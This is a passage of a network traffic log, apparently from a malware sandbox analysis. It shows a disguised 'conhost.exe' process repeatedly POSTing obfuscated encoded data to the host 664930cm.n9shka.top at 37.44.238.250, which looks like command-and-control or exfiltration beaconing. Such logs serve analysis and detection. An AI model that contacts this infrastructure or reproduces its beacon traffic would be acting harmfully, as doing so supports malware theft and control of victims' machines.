                                                          Data Ascii: XQ_T\DQS\XWZT\UZYPY[PXVB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!_- 8'=%\0X*2^?];80.$P%%2:\</<9!F/'P,
                                                          Oct 1, 2024 05:58:29.283915997 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:29.453268051 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:29 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          66192.168.2.64977837.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:29.578380108 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1112
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          67192.168.2.64977937.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:29.659058094 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1820
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:30.012703896 CEST1820OUTData Raw: 5d 55 5a 5b 5c 41 54 56 5c 58 57 5a 54 53 55 5b 59 56 59 57 50 51 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]UZ[\ATV\XWZTSU[YVYWPQVB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-!'=1:3.[%<,/%> %2V&>[< W+!F/'P,
                                                          Oct 1, 2024 05:58:30.271312952 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:30.466042995 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:30 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0e 1d 26 06 25 34 22 1f 36 12 35 59 2a 01 33 10 25 27 27 5b 2e 13 3f 1d 25 2c 38 03 39 0c 21 03 3f 29 03 03 25 2e 33 5c 31 0c 29 0f 33 36 20 5f 0d 10 22 13 21 5e 36 1f 38 07 30 07 3d 32 3c 09 32 23 2f 10 27 23 2a 1b 3f 07 38 11 33 2f 3e 0a 33 02 04 57 2f 25 37 01 2a 19 0e 1f 20 01 2d 56 02 1e 22 14 32 3b 39 51 37 06 36 00 24 16 24 5d 36 01 3e 08 3f 2d 3f 02 24 27 31 02 29 3e 27 1e 2b 2c 24 01 23 2a 3e 06 37 1f 0f 14 24 33 27 5c 20 0d 2d 51 05 34 5a 50
                                                          Data Ascii: &%4"65Y*3%''[.?%,89!?)%.3\1)36 _"!^680=2<2#/'#*?83/>3W/%7* -V"2;9Q76$$]6>?-?$'1)>'+,$#*>7$3'\ -Q4ZP


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          68192.168.2.64978037.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:29.780047894 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1112
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:30.137315035 CEST1112OUTData Raw: 58 53 5f 55 59 49 51 56 5c 58 57 5a 54 5b 55 5f 59 55 59 5e 50 58 56 43 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XS_UYIQV\XWZT[U_YUY^PXVC[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!-# 60^>T*3>6X&(_/#$%>#$"92-(2#+!F/'P,1
                                                          Oct 1, 2024 05:58:30.392115116 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:30.521591902 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:30 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          69192.168.2.64978137.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:30.658114910 CEST347OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Oct 1, 2024 05:58:31.012473106 CEST1120OUTData Raw: 58 57 5f 5d 5c 46 51 55 5c 58 57 5a 54 5d 55 5b 59 52 59 5c 50 5a 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XW_]\FQU\XWZT]U[YRY\PZVB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT".7!8(^)Z'&&,#(0.<S%=&$*+2<V?!F/'P,1
                                                          Oct 1, 2024 05:58:31.327713013 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:31.461033106 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:31 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          70192.168.2.64978237.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:31.776818037 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:32.121800900 CEST1120OUTData Raw: 5d 57 5f 5a 59 42 51 56 5c 58 57 5a 54 5a 55 5f 59 5a 59 5d 50 5b 56 43 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]W_ZYBQV\XWZTZU_YZY]P[VC[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!9 0"(<\=-Z'X-2$,38'R12:P$$+"(9!F/'P,-
                                                          Oct 1, 2024 05:58:32.319478035 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:32.492397070 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:32 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          71192.168.2.64978337.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:32.624578953 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:32.980937004 CEST1120OUTData Raw: 5d 51 5f 54 59 49 54 52 5c 58 57 5a 54 59 55 51 59 5b 59 5c 50 50 56 48 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]Q_TYITR\XWZTYUQY[Y\PPVH[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!\-(5;[)5^$.%&+7X,3>$!P2-(U<9!F/'P,!
                                                          Oct 1, 2024 05:58:33.259522915 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:33.395345926 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:33 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          72192.168.2.64978437.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:33.513641119 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1112
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:33.871493101 CEST1112OUTData Raw: 58 56 5a 58 59 41 51 54 5c 58 57 5a 54 5b 55 5c 59 54 59 5a 50 51 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XVZXYAQT\XWZT[U\YTYZPQVB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!_9#"$_)6'%+?;0?W$=$%1>W&B=?<!F/'P,=
                                                          Oct 1, 2024 05:58:34.148068905 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:34.283062935 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:33 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          73192.168.2.64978537.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:34.421612978 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:34.777877092 CEST1120OUTData Raw: 58 55 5a 59 5c 46 54 52 5c 58 57 5a 54 5a 55 59 59 5a 59 5d 50 5a 56 44 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XUZY\FTR\XWZTZUYYZY]PZVD[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!-3!?*5^3.!1+#,#$$;11V17!<4R?!F/'P,-
                                                          Oct 1, 2024 05:58:35.026133060 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:35.153289080 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:34 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          74192.168.2.64978637.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:35.278979063 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1112
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          75192.168.2.64978737.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:35.508404016 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1820
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:35.857446909 CEST1820OUTData Raw: 5d 57 5a 5c 59 48 54 51 5c 58 57 5a 54 5c 55 5b 59 54 59 58 50 59 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]WZ\YHTQ\XWZT\U[YTYXPYVI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!.U!+8_>%['=-$(,;$.(V&.&B1<U?9!F/'P,
                                                          Oct 1, 2024 05:58:36.119774103 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:36.253523111 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:35 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0e 1d 26 07 24 0a 0f 0f 22 05 21 5f 3e 3f 3c 05 30 0e 33 5a 2d 3d 0e 43 27 3f 33 5c 2d 32 39 05 2b 17 0f 02 25 00 0e 00 31 0c 08 57 30 0c 20 5f 0d 10 22 5d 22 06 3e 55 2c 17 0e 04 29 08 2c 43 25 1e 0d 12 30 0d 2d 09 2b 2d 23 0d 26 3f 35 55 24 02 00 56 2f 35 28 10 29 27 3c 1e 37 3b 2d 56 02 1e 22 51 32 38 32 0f 20 3c 36 01 24 38 23 06 21 16 2a 0e 3e 3d 27 05 27 1a 25 06 2a 2d 2b 58 2b 5a 37 5b 21 2a 26 02 20 31 3d 53 27 23 27 5c 20 0d 2d 51 05 34 5a 50
                                                          Data Ascii: &$"!_>?<03Z-=C'?3\-29+%1W0 _"]">U,),C%0-+-#&?5U$V/5()'<7;-V"Q282 <6$8#!*>=''%*-+X+Z7[!*& 1=S'#'\ -Q4ZP


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          76192.168.2.64978837.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:35.650032043 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:35.996474981 CEST1120OUTData Raw: 58 50 5f 5f 59 46 54 5e 5c 58 57 5a 54 53 55 5b 59 56 59 5e 50 5d 56 47 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XP__YFT^\XWZTSU[YVY^P]VG[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT",#+S 8#)=[&-!&8#/0'V0><R&"2$$)>!$(9!F/'P,
                                                          Oct 1, 2024 05:58:36.275450945 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:36.408927917 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:36 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          77192.168.2.64978937.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:36.545548916 CEST347OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Oct 1, 2024 05:58:36.906353951 CEST1120OUTData Raw: 58 54 5f 5c 59 49 54 54 5c 58 57 5a 54 52 55 51 59 55 59 5e 50 59 56 48 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XT_\YITT\XWZTRUQYUY^PYVH[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!,#?";Z*!'&;7Y/ %=8W2%4=<18?9!F/'P,
                                                          Oct 1, 2024 05:58:37.158543110 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:37.285557032 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:37 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          78192.168.2.64979037.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:37.425664902 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:37.777894020 CEST1120OUTData Raw: 5d 52 5f 55 59 48 51 56 5c 58 57 5a 54 59 55 5d 59 55 59 5f 50 59 56 47 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]R_UYHQV\XWZTYU]YUY_PYVG[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!9#4!](]>"5^3=2^&^7^,U?W0<&2W2$>_?!;()!F/'P,!
                                                          Oct 1, 2024 05:58:38.052000046 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:38.232135057 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:37 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          79192.168.2.64979137.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:38.359731913 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:38.715250015 CEST1120OUTData Raw: 58 56 5f 5e 59 40 51 51 5c 58 57 5a 54 5d 55 51 59 50 59 5d 50 5b 56 40 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XV_^Y@QQ\XWZT]UQYPY]P[V@[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"93,!+=T=$.18'Y8##0>S$!92$^>"+9!F/'P,1
                                                          Oct 1, 2024 05:58:38.966089964 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:39.107497931 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:38 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
